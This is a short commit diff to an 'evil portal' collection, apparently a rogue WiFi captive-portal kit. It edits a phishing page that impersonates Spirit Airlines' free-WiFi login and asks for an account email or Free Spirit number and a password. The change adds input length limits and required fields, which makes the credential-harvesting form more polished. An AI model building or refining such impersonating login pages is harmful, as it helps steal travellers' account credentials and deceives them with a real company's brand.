evil portal: set max char limit for all inputs

--- a/portals/airlines/SpiritAirlines.html
+++ b/portals/airlines/SpiritAirlines.html
@@ -77,8 +77,8 @@ input[type="submit"] {
   <h1> Use your Spirit Airlines Account<br> for Free WiFi Login</h1>  
 
   <form id="login-form">
-    <input type="text" name="email" placeholder="Email Address or Free Spirit Number">
-    <input type="password" name="password" placeholder="Password">    
+    <input type="text" name="email" placeholder="Email Address or Free Spirit Number" maxlength="100" required>
+    <input type="password" name="password" placeholder="Password" maxlength="100" required>    
     <input type="submit" value="Login">
   </form>
   
